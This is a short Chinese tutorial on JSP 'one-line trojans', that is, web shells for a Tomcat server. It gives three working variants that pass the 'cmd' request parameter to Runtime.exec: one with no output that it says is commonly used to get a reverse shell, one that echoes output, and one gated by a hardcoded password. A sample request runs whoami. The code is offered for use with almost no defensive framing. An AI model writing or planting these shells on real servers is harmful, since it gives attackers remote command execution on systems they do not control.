java安全——jsp一句话木马_cmd写jsp一句话

jsp回显一句话木马

---

提示：以下是本篇文章正文内容，下面案例可供参考

一、搭建web服务

1、创建空白maven项目，搭建本地tomcat

2、引入servlet的pom依赖

二、无回显一句话

 <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
1
2
3

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址，常用来反弹shell

三、带回显一句话

代码如下（示例）：

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
  %>
1
2
3
4
5
6
7
8
9
10

---

三、有密码带回显一句话

  <%
    if ("password".equals(request.getParameter("pass"))){
      Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String line;
      while ((line = bufferedReader.readLine()) != null){
        response.getWriter().println(line);
      }
    }
  %>
1
2
3
4
5
6
7
8
9
10
11
12